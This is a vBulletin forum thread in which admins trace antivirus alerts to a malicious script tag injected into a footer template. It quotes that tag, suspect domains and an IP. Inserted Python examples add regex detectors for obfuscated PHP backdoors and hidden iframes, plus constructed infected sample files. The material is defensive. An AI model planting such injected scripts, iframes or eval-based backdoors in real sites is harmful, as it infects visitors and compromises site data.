Forums triggering virus alerts

  • Wardsweb
    Member
    • Aug 2004
    • 46
    • 3.7.x

    Forums triggering virus alerts

    In the last week both Audiokarma.org and Videokarma.org have members posting about the forums setting off their virus protection. I cannot find anywhere in the templates that something has been added. Possibly in a post, signature or a JS running somewhere. When they list the site that gets blocked by their software, I search the site but find nothing. For now I just add the offending IP to a .htaccess file on the server.

    sites talked about on the forums:
    w5e3ir.com
    nvsq5x.com


    Any clue how to go about finding how these are getting launched?
  • adnoid
    New Member
    • Mar 2008
    • 10
    • 3.7.x

    #2
    Originally posted by Wardsweb
    In the last week both Audiokarma.org and Videokarma.org have members posting about the forums setting off their virus protection. I cannot find anywhere in the templates that something has been added. Possibly in a post, signature or a JS running somewhere. When they list the site that gets blocked by their software, I search the site but find nothing. For now I just add the offending IP to a .htaccess file on the server.

    sites talked about on the forums:
    w5e3ir.com
    nvsq5x.com


    Any clue how to go about finding how these are getting launched?
    Boy, I've been getting this as well. Of course, everyone assumes it's our board that's doing it, but we're on a dedicated server and I've just checked it again.

    Posted this on our site, any thoughts from anyone would be welcome.


    • Trevor Hannant
      vBulletin Support
      • Aug 2002
      • 24325
      • 5.7.X

      #3
      Can you try re-downloading the ZIP file from the Members Area and re-upload all files (except install/install.php and includes/config.php.new) making sure you overwrite all files currently on your server.

      Does this resolve the problem?
      Vote for:

      - Admin Settable Paid Subscription Reminder Timeframe (vB6)
      - Add Admin ability to auto-subscribe users to specific channel(s) (vB6)


      • Wardsweb
        Member
        • Aug 2004
        • 46
        • 3.7.x

        #4
        While only about 10 of the 116,000 members have problems, I'm not going to be too worried about it. Reloading the site would be the last option. There are a lot of modules, graphic and monetary changes to the site making a reload a not so simple task.


        • Simon Lloyd
          Senior Member
          • Apr 2008
          • 610
          • 3.7.x

          #5
          Originally posted by Wardsweb
          While only about 10 of the 116,000 members have problems, I'm not going to be too worried about it. Reloading the site would be the last option. There are a lot of modules, graphic and monetary changes to the site making a reload a not so simple task.
          You shouldn't have a problem with following Trevor's suggestion unless you have modified vBulletin core files. If you haven't, then nothing that you have done to your forum mods, templates, CSS or database will change. If you do have an issue it could potentially be scraping data from your database, including emails, passwords and anything else that's stored.

          I know because I have just helped another forum owner out that had been infected through a poorly secured modification (it's been fixed now at vb.org) which allowed the attacker to upload an extra file to the includes folder, which in turn gets ALL the information of that server, and I mean everything!
          Kind regards,
          Simon
          Microsoft Office Discussion


          • syrus.xl
            Senior Member
            • Jun 2005
            • 546

            #6
            Hi,

            Sounds like you have an iframe sql injection. It can be in your templates, but not always - it varies.

            Checking your source code may or may not find it either. Download Developer Tools for Firefox, then check Generated Source Code; this will show up any hidden source code that you normally will not see. Once you find which template it is, just hit Save on that template and it will remove any injected code.

            Re-uploading all vBulletin core files will not always correct this problem if the person has hidden 'backdoor' files in your vBulletin, in which case check your Suspect Files for Base64 coding, or additional encoded JavaScript files, all of which will 'kill' your forum eventually.

            Leaving 'backdoor' files in vBulletin or any script will not stop a malicious attack, even if you are running the latest vBulletin with all patches. Blocking IPs in your .htaccess file will just cause your forum to respond slower after a while, since each IP will be checked before allowing access.

            Regards,

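The advice above (check Suspect Files for Base64 coding, encoded JavaScript, hidden iframes in templates) can be turned into a repeatable scan. The following is an added example, not code from the thread or from vBulletin: it walks a directory of PHP and template files and flags the heuristic indicators that a template-injection or backdoor file usually carries. The pattern list, the sample files and the `includes/cache.php` name are all constructed for the example.

```python
import os
import re
import tempfile

# Heuristic indicators of PHP backdoors and injected template markup.
# Assumption: this list is the example's own, not a vBulletin-provided signature set.
SUSPECT_PATTERNS = {
    # eval() fed by a decoder is the classic shape of an obfuscated web shell
    "eval_of_decoded": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # a very long base64 literal is a payload waiting to be decoded
    "long_base64_literal": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
    # preg_replace with the /e modifier evaluates the replacement as PHP
    "preg_replace_e": re.compile(
        r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I),
    # calling a function whose name comes straight from the request
    "request_as_callable": re.compile(
        r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I),
    # zero-sized or invisible iframes are the usual carrier of drive-by redirects
    "hidden_iframe": re.compile(
        r"<iframe[^>]*(?:(?:width|height)\s*=\s*['\"]?0\b|visibility\s*:\s*hidden)", re.I),
}


def scan_text(text, name="<text>"):
    """Return (file, line, indicator, snippet) for every indicator hit in one file."""
    hits = []
    for label, pattern in SUSPECT_PATTERNS.items():
        for match in pattern.finditer(text):
            line = text.count("\n", 0, match.start()) + 1
            hits.append((name, line, label, match.group(0)[:60]))
    return hits


def scan_tree(root, extensions=(".php", ".html", ".js")):
    """Walk a forum install (or an export of its templates) and collect all hits."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in sorted(files):
            if fname.lower().endswith(extensions):
                path = os.path.join(dirpath, fname)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(fh.read(), os.path.relpath(path, root)))
    return findings


# Constructed samples: one clean helper, one backdoor, one injected footer template.
CLEAN_PHP = (
    "<?php\n"
    "// ordinary helper, nothing to report\n"
    "function greet($n) { return 'Hello ' . htmlspecialchars($n); }\n"
)
BACKDOOR_PHP = (
    "<?php\n"
    "// constructed sample: payload hidden in a long base64 literal\n"
    "$p = '" + "QUJD" * 60 + "';\n"
    "eval(gzinflate(base64_decode($p)));\n"
)
INJECTED_TEMPLATE = (
    "<div class=\"footer\">\n"
    "<iframe src=\"http://www.pageviewapi.com/icons/icons.php\" width=\"0\" height=\"0\"></iframe>\n"
    "</div>\n"
)
SAMPLES = {
    "includes/functions.php": CLEAN_PHP,
    "includes/cache.php": BACKDOOR_PHP,       # hypothetical dropped file name
    "footer_template.html": INJECTED_TEMPLATE,
}


def demo():
    """Write the samples to a scratch directory and scan it, returning the findings."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for name, line, label, snippet in demo():
        print(f"{name}:{line}: {label}: {snippet}")
```

Run it against the web root (or against templates exported from the database, since vBulletin keeps them there rather than on disk), then diff the hits against a clean copy of the same version. Long base64 literals also appear in legitimate places such as embedded images in CSS, so treat the output as a review queue rather than a verdict.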

            • creativepart
              Senior Member
              • Jan 2006
              • 293
              • 3.8.x

              #7
              A lot of forums suddenly started having issues yesterday. Our users suddenly have to hit their "back" button multiple times to move back one page. Seems that MS IE users are complaining exclusively. But I'm not positive. My users have pointed out issues with some file called www.alltagcloud.info/icons/index.html. I network with a couple of dozen other VB forum admins; they started seeing this yesterday as well. They are thinking it's some AdSense ad possibly.
              Last edited by creativepart; Sun 18 Dec '11, 3:10pm.


              • creativepart
                Senior Member
                • Jan 2006
                • 293
                • 3.8.x

                #8
                We found it on our system. Look for this code:
                Code:
                <script type="text/javascript" src="http://www.pageviewapi.com/icons/icons.php"></script>
                We found it in the Footer -- right after the
                Code:
                <form action="$vboptions[forumhome].php" method="get">


                • Wardsweb
                  Member
                  • Aug 2004
                  • 46
                  • 3.7.x

                  #9
                  Originally posted by creativepart
                  We found it on our system. Look for this code:
                  Code:
                  <script type="text/javascript" src="http://www.pageviewapi.com/icons/icons.php"></script>
                  We found it in the Footer -- right after the
                  Code:
                  <form action="$vboptions[forumhome].php" method="get">
                  Thanks - I looked but not found.


                  • Wardsweb
                    Member
                    • Aug 2004
                    • 46
                    • 3.7.x

                    #10
                    Many members have referenced the Toolkit and this IP address 178.17.163.189. The domain name may change but the IP is the same. Even with this IP set 178.17.163. in the .htaccess, some are still getting hit.

                    Even the hosting company is trying to find where this is being launched to no avail.


                    • MarkTTU
                      New Member
                      • Dec 2011
                      • 9
                      • 3.8.x

                      #11
                      We have a few members grumbling about this as well, but thus far I haven't been able to find a thing. I've even tried accessing the site from inside a VM with virgin XP and 7 installs and no protection of any kind hoping to get some kind of infection, but haven't managed to infect myself.

                      I did look and couldn't find any reference to www.pageviewapi.com anywhere.
                      Host for ShopFloorTalk.com


                      • creativepart
                        Senior Member
                        • Jan 2006
                        • 293
                        • 3.8.x

                        #12
                        When we had this issue I downloaded and installed Fiddler2 on my desktop computer. This little free program runs in a separate window and lists every file, function and script called while your page loads. I couldn't "see" any problems on my site until I loaded this and watched a page load. That's when I started seeing some script at alltagcloud.info loading with each page load. And, since Fiddler2 shows everything loading in order I could see that the script was being called near or in the footer which narrowed down the search. We were surprised to find the script was actually named something different than alltagcloud.info and I'd guess they have multiple versions of this with different names. Initially something named "pageviewapi.com" sounding fairly normal for the standard VB footer code.

                        You might want to check out http://www.fiddler2.com/fiddler2/ and see if that helps.

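Post #8 found the injected `<script>` tag sitting in the footer right after the search form, and post #12 found it by watching every resource load in order with Fiddler. The same inventory can be produced from a saved copy of the served page (for example the Generated Source view mentioned earlier). This is an added example, not the thread's or vBulletin's code: it lists every fetched resource in document order, resolves each to a host, and flags hosts that are neither the forum itself nor on an allowlist. The page URL, the allowlist and the trimmed sample page are constructed; the injected script URL is the one quoted in post #8.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Tags whose attribute causes a fetch when the page renders.
RESOURCE_ATTRS = {
    "script": "src", "iframe": "src", "img": "src",
    "link": "href", "embed": "src", "object": "data",
}


class ResourceCollector(HTMLParser):
    """Record every fetched resource in document order, like a proxy's request log."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.resources = []  # (tag, absolute_url)

    def handle_starttag(self, tag, attrs):
        attr = RESOURCE_ATTRS.get(tag)
        if attr is None:
            return
        value = dict(attrs).get(attr)
        if value:
            # Resolve relative paths against the page so every entry has a host
            self.resources.append((tag, urljoin(self.page_url, value)))


def inventory(html, page_url, trusted_hosts=()):
    """Return one record per loaded resource, flagging hosts outside the allowlist."""
    collector = ResourceCollector(page_url)
    collector.feed(html)
    collector.close()
    own_host = urlparse(page_url).hostname
    report = []
    for order, (tag, url) in enumerate(collector.resources, start=1):
        host = urlparse(url).hostname or ""
        report.append({
            "order": order, "tag": tag, "url": url, "host": host,
            "trusted": host == own_host or host in trusted_hosts,
        })
    return report


def untrusted(report):
    """The entries a forum admin has to explain: scripts and frames from unknown hosts."""
    return [r for r in report if not r["trusted"]]


# Constructed inputs: forum URL, the ad provider the forum knowingly uses,
# and a trimmed vBulletin-style page whose footer carries the injected tag.
PAGE_URL = "http://forum.example.com/forum/index.php"
TRUSTED = {"pagead2.googlesyndication.com"}
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" type="text/css" href="clientscript/vbulletin.css" />
<script type="text/javascript" src="clientscript/vbulletin_global.js"></script>
</head><body>
<img src="images/misc/logo.gif" alt="logo" />
<script type="text/javascript" src="//pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<div class="footer">
<form action="index.php" method="get">
<script type="text/javascript" src="http://www.pageviewapi.com/icons/icons.php"></script>
</form></div></body></html>"""


if __name__ == "__main__":
    report = inventory(SAMPLE_HTML, PAGE_URL, TRUSTED)
    for r in report:
        flag = "" if r["trusted"] else "  <-- not on allowlist"
        print(f"{r['order']:2d} {r['tag']:<6} {r['url']}{flag}")
```

The order column narrows the search the same way Fiddler did for post #12: a hit numbered last among the body resources points at the footer template. This sees only what the served HTML references directly; a script that in turn loads further scripts only shows up in a live proxy capture, which is why both views are worth keeping.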

                        • Wardsweb
                          Member
                          • Aug 2004
                          • 46
                          • 3.7.x

                          #13
                          Originally posted by Simon Lloyd
                          You shouldn't have a problem with following Trevor's suggestion unless you have modified vBulletin core files. If you haven't, then nothing that you have done to your forum mods, templates, CSS or database will change. If you do have an issue it could potentially be scraping data from your database, including emails, passwords and anything else that's stored.

                          I know because I have just helped another forum owner out that had been infected through a poorly secured modification (it's been fixed now at vb.org) which allowed the attacker to upload an extra file to the includes folder, which in turn gets ALL the information of that server, and I mean everything!
                          We are on a dedicated server, so I had the server company replace all the templates from a backup. We back up the site daily and used one from 30 days ago to retrieve the files. Still there are a couple of posts after the reinstall of people being hit. Whatever it is, it is very nasty, taking over their computers to the point of having to reformat or reinstall from a cloned drive or backup.


                          • MarkTTU
                            New Member
                            • Dec 2011
                            • 9
                            • 3.8.x

                            #14
                            Originally posted by creativepart
                            You might want to check out http://www.fiddler2.com/fiddler2/ and see if that helps.
                            Been playing around with the forum with Fiddler2 and have yet to find anything. Could it be that these guys got infected somewhere else and it gets triggered when they visit a VB site?
                            Host for ShopFloorTalk.com


                            • 45Wheelgun
                              Member
                              • May 2009
                              • 41
                              • 3.8.x

                              #15
                              Our forum has been dealing with this since December 11. We have had 25-30 people over 16 days report issues. We are a mid-sized board with 20,000+ uniques per day. Out of 20k uniques per day, 1 or 2 of them report either getting a virus, or having their virus software notify them that a virus was blocked. That is .005% of our unique visitors reporting issues. Of course all of them claim it only happens when they visit our website.

                              We run on dedicated servers which have been checked, rechecked and then checked again. We have compared our files with the maintenance tools as well as our templates. I have had a group of people running Fiddler2 for days and none of us has seen anything.

                              I would love to figure this one out. I would like to know why it only bothers a small fraction of my users.
